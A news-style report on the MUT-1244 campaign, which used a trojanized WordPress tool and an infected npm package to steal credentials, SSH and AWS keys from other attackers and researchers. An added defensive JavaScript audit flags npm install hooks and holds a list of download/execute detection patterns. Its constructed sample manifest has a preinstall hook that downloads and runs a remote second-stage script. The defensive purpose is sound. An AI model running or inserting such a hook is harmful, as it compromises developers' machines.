In an ironic turn of events, a sophisticated hacking group has managed to steal hundreds of thousands of WordPress login credentials from fellow cybercriminals through a deceptive software supply chain attack.
Security researchers from Datadog Security Labs revealed that an unidentified threat group, dubbed MUT-1244, orchestrated a year-long campaign targeting both malicious actors and security researchers by distributing trojanized versions of legitimate-looking software tools.
The attackers published a seemingly helpful WordPress tool called "yawpp" on GitHub that secretly contained malicious code. When users installed this tool, it would automatically download an infected npm package that deployed data-stealing malware on their systems.
Through this deceptive approach, the hackers collected over 390,000 WordPress account credentials, which had most likely already been stolen by other cybercriminals. The stolen data was quietly exfiltrated to a Dropbox account controlled by the attackers.
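The chaining step described above, a tool that pulls in an npm dependency which runs code at install time, is where a defender can look first. As an added example (not code from the Datadog report or from the yawpp tool), the following audit flags npm lifecycle hooks that fetch or execute remote content during installation; the manifests, package names and the address 203.0.113.10 are constructed samples.

```javascript
// Added example: audit an npm package manifest for install-time lifecycle
// scripts that fetch or run remote code. Sample manifests below are
// constructed for illustration; package names are hypothetical.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns indicating that a hook downloads, decodes or executes code.
const SUSPICIOUS_PATTERNS = [
  /\bcurl\b/i, /\bwget\b/i, /\bnode\s+-e\b/i, /\beval\(/i,
  /https?:\/\//i, /\bbase64\b/i, /\bchmod\s+\+x\b/i,
];

// Return one finding per lifecycle hook whose command matches a pattern.
function auditManifest(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue; // hook absent or malformed
    const hits = SUSPICIOUS_PATTERNS.filter((re) => re.test(cmd)).map(String);
    if (hits.length > 0) {
      findings.push({ package: manifest.name, hook, command: cmd, matched: hits });
    }
  }
  return findings;
}

// Constructed samples: a benign manifest and a trojanized one whose
// preinstall hook downloads a second stage and runs it (address is TEST-NET).
const BENIGN = { name: 'example-benign', scripts: { test: 'mocha', build: 'tsc' } };
const TROJANIZED = {
  name: 'example-trojanized',
  scripts: {
    build: 'tsc',
    preinstall: 'curl -s http://203.0.113.10/stage.js -o /tmp/stage.js && node /tmp/stage.js',
  },
};

// Run the audit over both samples so the result can be inspected or asserted on.
function demo() {
  return { benign: auditManifest(BENIGN), trojanized: auditManifest(TROJANIZED) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

In practice the same function would be applied to every `package.json` under `node_modules` after a dry-run install, or to manifests pulled from the registry before installing with `--ignore-scripts` lifted.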
The campaign employed multiple sophisticated techniques, including:
- Malicious GitHub repositories posing as security tools
- Infected npm packages that appeared legitimate
- Phishing emails targeting academic researchers
- Backdoored software that could steal sensitive data
Beyond stealing WordPress credentials, the malware also harvested SSH keys, AWS access credentials, and system information from infected machines every 12 hours while simultaneously running cryptocurrency mining operations.
The true identity and motives of MUT-1244 remain unknown. The professional quality of their malware and the precision of their attacks suggest they are a highly skilled group, though their diverse targeting and tactics have left researchers puzzled about their ultimate objectives.
This case highlights an unusual scenario in the cybercrime landscape, where hackers successfully turned the tables on other malicious actors, using their own methods against them.